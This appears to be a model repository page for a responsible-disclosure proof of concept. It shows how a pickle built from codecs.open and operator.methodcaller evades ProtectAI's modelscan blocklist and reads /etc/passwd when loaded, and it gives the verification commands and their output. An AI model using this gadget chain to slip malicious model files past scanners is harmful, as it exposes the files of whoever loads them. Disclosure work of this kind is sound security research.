You need to agree to share your contact information to access this model

This repository is publicly accessible, but you have to accept the conditions to access its files and content.

Log in or Sign Up to review the conditions and access this model content.

Modelscan Bypass PoC: codecs.open + operator.methodcaller

Purpose: Security research demonstrating a scanner bypass in ProtectAI modelscan.

Technique

  • codecs.open is not in modelscan's unsafe_globals blocklist (only builtins.open is blocked)
  • operator.methodcaller is not blocked (only operator.attrgetter is)
  • Chain: methodcaller('read')(codecs.open('/etc/passwd')) → reads any file

Verification

pip install modelscan
modelscan scan -p model.pkl
# Output: "No issues found!"

python3 -c "import pickle; print(pickle.load(open('model.pkl','rb'))[:100])"
# Output: contents of /etc/passwd

Responsible Disclosure

Submitted to ProtectAI via Huntr MFV program.

Downloads last month

-

Downloads are not tracked for this model. How to track
Inference Providers NEW
This model isn't deployed by any Inference Provider. 🙋 Ask for provider support